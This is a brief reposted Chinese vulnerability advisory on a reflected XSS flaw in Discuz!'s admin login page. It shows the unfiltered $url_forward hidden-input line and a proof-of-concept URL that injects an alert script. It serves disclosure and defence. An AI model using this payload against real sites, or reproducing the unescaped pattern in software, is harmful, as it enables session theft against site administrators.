Discuz! admincp.php xss bug 's

2017年4月30日04:24:50评论378 views字数 312阅读1分2秒阅读模式

摘要

由于Discuz!的后台登陆文件$url_forward没有过滤导致一个严重的xss bug.
author: 80vul-B
team:http://www.80vul.com

漏洞存在于文件admin/login.inc.php里$url_forward没有被过滤导致xss漏洞:

<input type="hidden" name="url_forward" value="$url_forward">

poc:
http://127.0.0.1/discuz/admincp.php?url_forward=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
[管理员或版主前台登录,但未登录后台时触发]

本文由 admin 发表于 2017年4月30日04:24:50
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Discuz! admincp.php xss bug 'shttps://cn-sec.com/archives/45760.html

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit